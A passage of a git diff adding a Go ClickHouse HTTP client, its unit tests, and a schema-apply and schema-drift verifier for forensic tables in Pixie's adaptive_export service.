+
+// Endpoint returns the (validated, trimmed) base URL — useful for log
+// fields where the caller wants to identify which CH the client targets.
+func (c *Client) Endpoint() string { return c.endpoint }
+
+// Exec POSTs sql as the request body (DDL / DML without source data). Returns
+// the response body bytes. Use for CREATE DATABASE, CREATE TABLE, etc.
+func (c *Client) Exec(ctx context.Context, sql string) ([]byte, error) {
+ return c.do(ctx, http.MethodPost, c.endpoint+"/", strings.NewReader(sql), "")
+}
+
+// Query GETs sql via ?query= so it shows up greppable in CH's query log.
+// Use for SELECT — the body is whatever FORMAT was requested. Buffers
+// the entire response in memory; for large result sets prefer
+// QueryStream.
+func (c *Client) Query(ctx context.Context, sql string) ([]byte, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ return c.do(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil, "")
+}
+
+// QueryStream GETs sql like Query, but returns the response body as an
+// io.ReadCloser the caller drains incrementally. Use for SELECTs whose
+// result set is unbounded (e.g. an active-set rehydrate that may be
+// multi-MB). Caller MUST Close the returned body, even on error.
+func (c *Client) QueryStream(ctx context.Context, sql string) (io.ReadCloser, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ req, err := http.NewRequestWithContext(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil)
+ if err != nil {
+ return nil, err
+ }
+ if c.user != "" {
+ req.SetBasicAuth(c.user, c.pass)
+ }
+ resp, err := c.hc.Do(req)
+ if err != nil {
+ return nil, err
+ }
+ if resp.StatusCode/100 != 2 {
+ msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ resp.Body.Close()
+ return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg)))
+ }
+ return resp.Body, nil
+}
+
+// InsertOptions tunes one Insert call.
+type InsertOptions struct {
+ // ContentType sets the HTTP Content-Type. Defaults to
+ // "application/x-ndjson" when empty (matches FORMAT JSONEachRow).
+ ContentType string
+ // FailLoud, when true, attaches the CH settings that turn silent
+ // drops into errors (input_format_skip_unknown_fields=0 etc.) —
+ // see setFailLoudSettings.
+ FailLoud bool
+ // Settings carries additional CH settings as URL params on the
+ // query string. Keys are passed through unchanged.
+ Settings url.Values
+}
+
+// InsertResult is what Insert returns on success.
+type InsertResult struct {
+ // Summary is the X-ClickHouse-Summary response header verbatim (may
+ // be empty — older CH or middlebox stripping). Callers parse for
+ // silent-drop detection.
+ Summary string
+ // BodyBytes is the count of bytes in the request body (not the
+ // response). Convenient for logging the wire size at the call site.
+ BodyBytes int
+}
+
+// Insert posts the body for an INSERT … FORMAT X statement (sql contains
+// the statement; body contains the data in the named format). The
+// per-call options carry content-type + the fail-loud setting.
+func (c *Client) Insert(ctx context.Context, sql string, body []byte, opts InsertOptions) (InsertResult, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ for k, vs := range opts.Settings {
+ for _, v := range vs {
+ q.Add(k, v)
+ }
+ }
+ if opts.FailLoud {
+ setFailLoudSettings(q)
+ }
+ ct := opts.ContentType
+ if ct == "" {
+ ct = "application/x-ndjson"
+ }
+ out, resp, err := c.doRaw(ctx, http.MethodPost, c.endpoint+"/?"+q.Encode(), bytes.NewReader(body), ct)
+ if err != nil {
+ return InsertResult{}, err
+ }
+ _ = out // discarded: INSERT bodies are empty
+ return InsertResult{
+ Summary: resp.Header.Get("X-ClickHouse-Summary"),
+ BodyBytes: len(body),
+ }, nil
+}
+
+// do is the simple variant used by Exec/Query — it discards the response
+// headers and only surfaces the body bytes.
+func (c *Client) do(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, error) {
+ out, _, err := c.doRaw(ctx, method, urlStr, body, contentType)
+ return out, err
+}
+
+// doRaw builds + sends one request, returning the body and the response
+// (so Insert can read the X-ClickHouse-Summary header). Non-2xx becomes a
+// formatted Go error.
+func (c *Client) doRaw(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, *http.Response, error) {
+ req, err := http.NewRequestWithContext(ctx, method, urlStr, body)
+ if err != nil {
+ return nil, nil, err
+ }
+ if contentType != "" {
+ req.Header.Set("Content-Type", contentType)
+ }
+ if c.user != "" {
+ req.SetBasicAuth(c.user, c.pass)
+ }
+ resp, err := c.hc.Do(req)
+ if err != nil {
+ return nil, nil, err
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ return nil, resp, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg)))
+ }
+ out, err := io.ReadAll(resp.Body)
+ if err != nil {
+ return nil, resp, err
+ }
+ return out, resp, nil
+}
+
+// setFailLoudSettings pins ClickHouse's input-format settings on every
+// INSERT so an upstream schema-drift surfaces as an HTTP 4xx with a real
+// error body, not a silent written_rows=0 + 200 OK that downstream
+// silent-drop detection only catches after the data is lost.
+//
+// input_format_skip_unknown_fields=0 fail on a column we write that
+// doesn't exist in CH.
+// input_format_null_as_default=0 fail on a NULL where the
+// column is non-nullable.
+// input_format_allow_errors_num=0 reject the whole batch on
+// the first parse error.
+// input_format_allow_errors_ratio=0 same, for the proportional
+// knob.
+func setFailLoudSettings(q url.Values) {
+ q.Set("input_format_skip_unknown_fields", "0")
+ q.Set("input_format_null_as_default", "0")
+ q.Set("input_format_allow_errors_num", "0")
+ q.Set("input_format_allow_errors_ratio", "0")
+}
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go
new file mode 100644
index 00000000000..28664911a14
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go
@@ -0,0 +1,184 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package chhttp
+
+import (
+ "context"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+)
+
+func TestNew_RejectsBadEndpoints(t *testing.T) {
+ for _, tc := range []struct {
+ name, ep string
+ }{
+ {"empty", ""},
+ {"no-scheme", "localhost:8123"},
+ {"unsupported-scheme", "ftp://localhost:8123"},
+ {"has-query", "http://localhost:8123/?foo=bar"},
+ {"has-fragment", "http://localhost:8123/#bar"},
+ } {
+ t.Run(tc.name, func(t *testing.T) {
+ if _, err := New(tc.ep, "", "", 0); err == nil {
+ t.Fatalf("New(%q) = nil err, want error", tc.ep)
+ }
+ })
+ }
+}
+
+func TestNew_DefaultsTimeout(t *testing.T) {
+ c, err := New("http://localhost:8123", "", "", 0)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if c.hc.Timeout != DefaultTimeout {
+ t.Fatalf("timeout = %v, want %v", c.hc.Timeout, DefaultTimeout)
+ }
+}
+
+func TestNew_StripsTrailingSlashFromEndpoint(t *testing.T) {
+ c, err := New("http://localhost:8123/", "", "", 0)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if c.Endpoint() != "http://localhost:8123" {
+ t.Fatalf("endpoint = %q, want trimmed", c.Endpoint())
+ }
+}
+
+func TestExec_PostsSQLAsBody(t *testing.T) {
+ var gotBody string
+ var gotMethod string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotMethod = r.Method
+ b, _ := io.ReadAll(r.Body)
+ gotBody = string(b)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ c, err := New(srv.URL, "", "", time.Second)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if _, err := c.Exec(context.Background(), "CREATE DATABASE x"); err != nil {
+ t.Fatalf("Exec: %v", err)
+ }
+ if gotMethod != http.MethodPost {
+ t.Fatalf("method = %q, want POST", gotMethod)
+ }
+ if gotBody != "CREATE DATABASE x" {
+ t.Fatalf("body = %q, want %q", gotBody, "CREATE DATABASE x")
+ }
+}
+
+func TestQuery_PutsSQLInURLParam(t *testing.T) {
+ var gotMethod, gotQuery string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotMethod = r.Method
+ gotQuery = r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(`{"hits":1}` + "\n"))
+ }))
+ defer srv.Close()
+
+ c, _ := New(srv.URL, "", "", time.Second)
+ body, err := c.Query(context.Background(), "SELECT 1")
+ if err != nil {
+ t.Fatalf("Query: %v", err)
+ }
+ if gotMethod != http.MethodGet {
+ t.Fatalf("method = %q, want GET", gotMethod)
+ }
+ if gotQuery != "SELECT 1" {
+ t.Fatalf("query = %q, want %q", gotQuery, "SELECT 1")
+ }
+ if !strings.Contains(string(body), "hits") {
+ t.Fatalf("body = %q", body)
+ }
+}
+
+func TestInsert_SetsContentTypeAndFailLoud(t *testing.T) {
+ var gotCT, gotQ string
+ gotSettings := map[string]string{}
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotCT = r.Header.Get("Content-Type")
+ gotQ = r.URL.Query().Get("query")
+ for _, k := range []string{"input_format_skip_unknown_fields", "input_format_null_as_default", "input_format_allow_errors_num", "input_format_allow_errors_ratio"} {
+ gotSettings[k] = r.URL.Query().Get(k)
+ }
+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"3"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ c, _ := New(srv.URL, "", "", time.Second)
+ res, err := c.Insert(context.Background(),
+ "INSERT INTO t FORMAT JSONEachRow", []byte("{}\n"),
+ InsertOptions{FailLoud: true})
+ if err != nil {
+ t.Fatalf("Insert: %v", err)
+ }
+ if gotCT != "application/x-ndjson" {
+ t.Fatalf("content-type = %q", gotCT)
+ }
+ if gotQ != "INSERT INTO t FORMAT JSONEachRow" {
+ t.Fatalf("query = %q", gotQ)
+ }
+ if gotSettings["input_format_skip_unknown_fields"] != "0" {
+ t.Fatalf("fail-loud not applied: %v", gotSettings)
+ }
+ if res.Summary != `{"written_rows":"3"}` {
+ t.Fatalf("summary = %q", res.Summary)
+ }
+ if res.BodyBytes != 3 {
+ t.Fatalf("body bytes = %d", res.BodyBytes)
+ }
+}
+
+func TestExec_PropagatesNon2xx(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(http.StatusBadRequest)
+ _, _ = w.Write([]byte("syntax error near 'GROOT'"))
+ }))
+ defer srv.Close()
+ c, _ := New(srv.URL, "", "", time.Second)
+ _, err := c.Exec(context.Background(), "GROOT")
+ if err == nil || !strings.Contains(err.Error(), "HTTP 400") || !strings.Contains(err.Error(), "syntax error") {
+ t.Fatalf("err = %v", err)
+ }
+}
+
+func TestExec_SendsBasicAuth(t *testing.T) {
+ var gotUser, gotPass string
+ var hadAuth bool
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotUser, gotPass, hadAuth = r.BasicAuth()
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+ c, _ := New(srv.URL, "default", "s3cret", time.Second)
+ if _, err := c.Exec(context.Background(), "SELECT 1"); err != nil {
+ t.Fatalf("Exec: %v", err)
+ }
+ if !hadAuth || gotUser != "default" || gotPass != "s3cret" {
+ t.Fatalf("basic auth: had=%v user=%q pass=%q", hadAuth, gotUser, gotPass)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel
new file mode 100644
index 00000000000..b83bc98cad7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "clickhouse",
+ srcs = [
+ "apply.go",
+ "ddl.go",
+ "insert.go",
+ ],
+ embedsrcs = ["schema.sql"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ ],
+)
+
+pl_go_test(
+ name = "clickhouse_test",
+ srcs = [
+ "apply_test.go",
+ "columns_test.go",
+ "ddl_test.go",
+ "insert_test.go",
+ ],
+ embed = [":clickhouse"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
new file mode 100644
index 00000000000..84b3afbbcb0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
@@ -0,0 +1,252 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "fmt"
+ "strings"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+)
+
+// OperatorOwnedTables is the subset of KnownTables the adaptive_export
+// operator creates on boot. Kubescape tables (alerts, kubescape_logs)
+// are NOT here — they are owned by the soc/tree/clickhouse-lab
+// installer. Order matters: adaptive_attribution last so it does not
+// reference any pixie table during creation (it does not, but the
+// invariant is cheap to keep).
+var OperatorOwnedTables = []string{
+ // 12 pixie socket_tracer tables — created BEFORE Pixie's retention
+ // plugin gets a chance to auto-DDL them (which would omit our
+ // namespace + pod columns and break analyst JOINs).
+ "http_events",
+ "http2_messages.beta",
+ "dns_events",
+ "redis_events",
+ "mysql_events",
+ "pgsql_events",
+ "cql_events",
+ "mongodb_events",
+ "kafka_events.beta",
+ "amqp_events",
+ "mux_events",
+ "tls_events",
+ // conn_stats — pixie observation table; created in the
+ // same boot pass as the others so Apply (here) and Verify (KnownTables
+ // in ddl.go) can't drift. The drift was a real regression: aeprod3/4/5
+ // shipped with this list at 14 entries while ddl.go's KnownTables had 15,
+ // so Apply created 14 tables on fresh install and Verify failed at boot
+ // with "conn_stats schema drift, missing columns". Locked down by
+ // TestOperatorOwnedTables_CoversAllPixieTables in apply_test.go.
+ "conn_stats",
+ // operator's write targets.
+ "adaptive_attribution",
+ "trigger_watermark",
+ // per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). Created on
+ // boot so a reconcile run has a target without manual DDL. Not a pixie
+ // table → not in PixieTables(), so VerifyPixieSchema ignores it.
+ "ae_reconcile",
+ // dx evidence-graph edge list — created on boot so the Pixie
+ // dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real,
+ // globally-registered table to read. dx emits edges, AE persists.
+ // Not a pixie socket_tracer table → not in PixieTables().
+ "dx_attack_graph",
+ // rule-ins-only VIEW over dx_attack_graph; created AFTER it (depends on it).
+ "dx_attack_graph_malicious",
+}
+
+// Applier applies operator-owned DDL to a ClickHouse cluster over the
+// HTTP interface (default 8123). Used at boot.
+type Applier struct {
+ c *chhttp.Client
+}
+
+// NewApplier validates the endpoint and returns a ready Applier.
+func NewApplier(endpoint, user, pass string) (*Applier, error) {
+ c, err := chhttp.New(endpoint, user, pass, 0)
+ if err != nil {
+ return nil, fmt.Errorf("clickhouse: %w", err)
+ }
+ return &Applier{c: c}, nil
+}
+
+// Apply ensures forensic_db exists, then runs CREATE TABLE IF NOT
+// EXISTS for every OperatorOwnedTables entry in declared order.
+// Idempotent. Returns the first error encountered without continuing —
+// callers should treat schema apply as a precondition for the rest of
+// boot.
+func (a *Applier) Apply(ctx context.Context) error {
+ if err := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); err != nil {
+ return fmt.Errorf("apply: create database forensic_db: %w", err)
+ }
+ for _, table := range OperatorOwnedTables {
+ ddl, err := DDL(table)
+ if err != nil {
+ return fmt.Errorf("apply: get DDL for %s: %w", table, err)
+ }
+ if err := a.execute(ctx, ddl); err != nil {
+ return fmt.Errorf("apply: create %s: %w", table, err)
+ }
+ }
+ return nil
+}
+
+// WriteAttackGraph inserts dx evidence-graph edges into
+// forensic_db.dx_attack_graph. jsonEachRow is newline-delimited JSON objects
+// whose keys are the column names (JSONEachRow; unknown keys are skipped,
+// missing columns default). No-op on empty input.
+func (a *Applier) WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error {
+ if len(jsonEachRow) == 0 {
+ return nil
+ }
+ _, err := a.c.Insert(ctx, "INSERT INTO forensic_db.dx_attack_graph FORMAT JSONEachRow",
+ jsonEachRow, chhttp.InsertOptions{})
+ return err
+}
+
+// execute is the DDL primitive — used by Apply for CREATE statements.
+func (a *Applier) execute(ctx context.Context, sql string) error {
+ _, err := a.c.Exec(ctx, sql)
+ return err
+}
+
+// SchemaDriftError is returned by VerifyPixieSchema when a pixie
+// observation table is missing one or more of the operator-required
+// columns. errors.Is-friendly.
+type SchemaDriftError struct {
+ Table string
+ Missing []string
+}
+
+func (e *SchemaDriftError) Error() string {
+ return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s",
+ e.Table, strings.Join(e.Missing, ", "))
+}
+
+// requiredPixieColumns are the columns every pixie observation table
+// MUST have for adaptive_attribution JOINs to work. namespace + pod are
+// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own
+// canonical columns we depend on.
+var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"}
+
+// VerifyPixieSchema queries system.columns for each pixie observation
+// table and confirms EVERY column AE writes for that table is present
+// in CH. This is the **writer ⇔ schema contract** test (the T1 in
+// the operator's PR #47 schema-loss report on 2026-06-07).
+//
+// The earlier shape of this function only checked the 4
+// operator-required columns (namespace/pod/hostname/time_) — a table
+// could be hand-created with those four plus a different subset of
+// data columns and pass verification, while AE's writer would post
+// JSON containing the column names schema.sql says the table should
+// have. The result on rig 6a25c85c: CH silently dropped 22 of 24
+// columns into nothing because they were "unknown fields"
+// (input_format_skip_unknown_fields default = 1), AE's
+// summaryWroteFewerThan saw written_rows=0 / rows_sent=259 only AFTER
+// the data was lost, and the controller hot-looped on the rejection.
+//
+// The expanded contract: for every table in PixieTables(), CH's
+// actual column set must be a superset of clickhouse.Columns(table) —
+// i.e. the canonical column list parsed out of schema.sql, which IS
+// the single source of truth.
+//
+// Returns the FIRST drift detected as *SchemaDriftError. Callers
+// usually want to log loudly and refuse to start so the misconfig
+// is visible — silently continuing leaves the table with a schema
+// the AE writer can't actually populate.
+func (a *Applier) VerifyPixieSchema(ctx context.Context) error {
+ for _, table := range PixieTables() {
+ actual, err := a.tableColumns(ctx, table)
+ if err != nil {
+ return fmt.Errorf("verify %s: %w", table, err)
+ }
+ // The canonical column shape AE expects (schema.sql).
+ want, err := Columns(table)
+ if err != nil {
+ return fmt.Errorf("verify %s: load expected columns: %w", table, err)
+ }
+ // Operator-required + canonical union, deduped.
+ need := make([]string, 0, len(want)+len(requiredPixieColumns))
+ seen := map[string]bool{}
+ for _, c := range want {
+ if !seen[c] {
+ seen[c] = true
+ need = append(need, c)
+ }
+ }
+ for _, c := range requiredPixieColumns {
+ if !seen[c] {
+ seen[c] = true
+ need = append(need, c)
+ }
+ }
+ var missing []string
+ for _, w := range need {
+ if !contains(actual, w) {
+ missing = append(missing, w)
+ }
+ }
+ if len(missing) > 0 {
+ return &SchemaDriftError{Table: table, Missing: missing}
+ }
+ }
+ return nil
+}
+
+// tableColumns lists the column names of forensic_db. as
+// reported by system.columns.
+func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) {
+ body, err := a.c.Query(ctx, fmt.Sprintf(
+ "SELECT name FROM system.columns WHERE database='forensic_db' AND table=%s FORMAT JSONEachRow",
+ quoteCH(table)))
+ if err != nil {
+ return nil, err
+ }
+ type row struct {
+ Name string `json:"name"`
+ }
+ var out []string
+ for _, line := range bytes.Split(body, []byte{'\n'}) {
+ line = bytes.TrimSpace(line)
+ if len(line) == 0 {
+ continue
+ }
+ var r row
+ if err := json.Unmarshal(line, &r); err != nil {
+ return nil, fmt.Errorf("parse system.columns row: %w", err)
+ }
+ out = append(out, r.Name)
+ }
+ return out, nil
+}
+
+func quoteCH(s string) string {
+ r := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s)
+ return "'" + r + "'"
+}
+
+func contains(s []string, x string) bool {
+ for _, v := range s {
+ if v == x {
+ return true
+ }
+ }
+ return false
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
new file mode 100644
index 00000000000..e108e05540c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go
@@ -0,0 +1,266 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+)
+
+// TestApply_ExecutesEveryOperatorOwnedTable — Apply POSTs one DDL per
+// table in OperatorOwnedTables, in order. None of the kubescape tables
+// (alerts, kubescape_logs) are touched — those belong to the soc installer.
+func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) {
+ var mu sync.Mutex
+ var bodies []string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ b, _ := io.ReadAll(r.Body)
+ mu.Lock()
+ bodies = append(bodies, string(b))
+ mu.Unlock()
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+ a, err := NewApplier(srv.URL, "", "")
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ if err := a.Apply(context.Background()); err != nil {
+ t.Fatalf("Apply: %v", err)
+ }
+ // 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls.
+ if got, want := len(bodies), len(OperatorOwnedTables)+1; got != want {
+ t.Fatalf("Apply made %d calls, want %d", got, want)
+ }
+ if !strings.Contains(bodies[0], "CREATE DATABASE IF NOT EXISTS forensic_db") {
+ t.Fatalf("first DDL must create the database; got: %s", bodies[0])
+ }
+ // Spot-check that the SECOND call is for the first OperatorOwnedTables entry,
+ // and that the LAST call is for the last OperatorOwnedTables entry (robust to
+ // new operator-owned tables being appended, e.g. dx_attack_graph).
+ if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) {
+ t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1])
+ }
+ lastTable := OperatorOwnedTables[len(OperatorOwnedTables)-1]
+ if !strings.Contains(bodies[len(bodies)-1], "forensic_db."+lastTable) {
+ t.Fatalf("last DDL not for %s; got: %s", lastTable, bodies[len(bodies)-1])
+ }
+ // And ensure no kubescape DDL leaked through.
+ for _, b := range bodies {
+ if strings.Contains(b, "forensic_db.alerts") || strings.Contains(b, "forensic_db.kubescape_logs") {
+ t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", b)
+ }
+ }
+}
+
+// TestApply_FailsFastOnHTTPError — if any CREATE returns non-2xx,
+// Apply returns immediately without attempting later tables.
+func TestApply_FailsFastOnHTTPError(t *testing.T) {
+ // atomic.Int32 because httptest's handler runs on its own goroutine
+ // while the test goroutine reads `calls` after Apply returns —
+ // without atomic the -race detector flags a data race even though
+ // the goroutines are happens-before-ordered by Apply's HTTP response.
+ var calls atomic.Int32
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := calls.Add(1)
+ if n == 1 {
+ w.WriteHeader(500)
+ _, _ = w.Write([]byte("ddl exploded"))
+ return
+ }
+ w.WriteHeader(200)
+ }))
+ defer srv.Close()
+ a, err := NewApplier(srv.URL, "", "")
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ if err := a.Apply(context.Background()); err == nil {
+ t.Fatalf("expected error from Apply on HTTP 500")
+ }
+ if got := calls.Load(); got != 1 {
+ t.Fatalf("Apply continued past first failure; calls = %d", got)
+ }
+}
+
+// tableForQuery extracts the table name from a system.columns query
+// like "...AND table='http_events' FORMAT JSONEachRow".
+func tableForQuery(q string) string {
+ const marker = "table='"
+ i := strings.Index(q, marker)
+ if i < 0 {
+ return ""
+ }
+ rest := q[i+len(marker):]
+ j := strings.Index(rest, "'")
+ if j < 0 {
+ return ""
+ }
+ return rest[:j]
+}
+
+// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard.
+// On rig 6a25c85c (PR #47 schema-loss report), http_events was created
+// by a hand-maintained stopgap that DIDN'T include req_path /
+// req_headers / etc. — the columns AE's writer puts into JSONEachRow
+// posts. The old VerifyPixieSchema only checked namespace/pod/hostname/
+// time_, so it passed; the writer's 22 unknown fields then got silently
+// dropped by CH at default settings. The expanded contract verifies
+// EVERY column AE expects per table is present in CH (the writer ⇔
+// schema contract). This test reproduces the rig 6a25c85c shape:
+// http_events comes back with the 4 operator-required columns but
+// missing the data columns the writer fills.
+func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ // Return only the operator-required columns for the first pixie
+ // table iterated; that's the regression shape — looks "valid"
+ // to the old checker but fails the writer-column union.
+ table := tableForQuery(r.URL.Query().Get("query"))
+ if table == "http_events" {
+ _, _ = w.Write([]byte(`{"name":"time_"}` + "\n"))
+ _, _ = w.Write([]byte(`{"name":"upid"}` + "\n"))
+ _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n"))
+ _, _ = w.Write([]byte(`{"name":"pod"}` + "\n"))
+ _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n"))
+ return
+ }
+ // Other tables (won't be reached) — fully populated.
+ cols, _ := Columns(table)
+ for _, c := range cols {
+ fmt.Fprintf(w, "{\"name\":%q}\n", c)
+ }
+ }))
+ defer srv.Close()
+ a, err := NewApplier(srv.URL, "", "")
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ err = a.VerifyPixieSchema(context.Background())
+ if err == nil {
+ t.Fatalf("expected SchemaDriftError; got nil")
+ }
+ var drift *SchemaDriftError
+ if !errors.As(err, &drift) {
+ t.Fatalf("err type = %T, want *SchemaDriftError", err)
+ }
+ if drift.Table != "http_events" {
+ t.Fatalf("first drift = %q, want http_events", drift.Table)
+ }
+ // Spot-check that several of the data columns the writer fills are
+ // flagged missing — that's the new coverage vs the old 4-column
+ // check.
+ for _, want := range []string{"req_path", "req_headers", "resp_status", "latency"} {
+ if !contains(drift.Missing, want) {
+ t.Errorf("Missing should include %q (writer-column drift); got %v", want, drift.Missing)
+ }
+ }
+}
+
+// TestVerifyPixieSchema_AllPresent — happy path. The mock server returns
+// the FULL schema.sql column shape for each table, so VerifyPixieSchema
+// confirms the writer ⇔ schema contract holds and returns nil.
+func TestVerifyPixieSchema_AllPresent(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ table := tableForQuery(r.URL.Query().Get("query"))
+ cols, err := Columns(table)
+ if err != nil {
+ http.Error(w, err.Error(), 500)
+ return
+ }
+ for _, c := range cols {
+ fmt.Fprintf(w, "{\"name\":%q}\n", c)
+ }
+ }))
+ defer srv.Close()
+ a, err := NewApplier(srv.URL, "", "")
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ if err := a.VerifyPixieSchema(context.Background()); err != nil {
+ t.Fatalf("VerifyPixieSchema: %v", err)
+ }
+}
+
+// TestNewApplier_RejectsBadEndpoint — defensive contract.
+func TestNewApplier_RejectsBadEndpoint(t *testing.T) {
+ if _, err := NewApplier("", "", ""); err == nil {
+ t.Fatalf("empty endpoint not rejected")
+ }
+ if _, err := NewApplier("http://%zz", "", ""); err == nil {
+ t.Fatalf("malformed endpoint not rejected")
+ }
+}
+
+// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard:
+// the operator never owns kubescape tables.
+func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) {
+ for _, x := range []string{"alerts", "kubescape_logs"} {
+ if contains(OperatorOwnedTables, x) {
+ t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", x)
+ }
